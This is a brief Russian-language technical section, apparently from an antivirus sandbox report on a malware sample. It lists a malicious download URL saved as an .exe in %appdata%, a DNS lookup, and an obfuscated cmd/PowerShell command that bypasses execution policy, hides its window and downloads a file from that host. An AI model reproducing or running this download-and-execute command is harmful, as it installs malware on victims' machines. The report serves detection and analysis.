Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRshe^lL.^exe^ ^-ex^EcU^T^i^ON^poLiCy bYP^a^s^S ^-nOPr^oFile -w^i^nd^OWSTYLE Hi^ddEn ^(^NEw-O^bjecT ^s^YSt^e^M.^NeT.w^e^BcLI^e^nt^).D^OWnLoAd^fIl^E(^'http://zonexxope...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "POWeRshe^lL.^exe^ ^-ex^EcU^T^i^ON^poLiCy bYP^a^s^S ^-nOPr^oFile -w^i^nd^OWSTYLE Hi^ddEn ^(^NEw-O^bjecT ^s^YSt^e^M.^NeT.w^e^BcLI^e^nt^).D^OWnLoAd^fIl^E(^'http://zonexxope...' (со скрытым окном)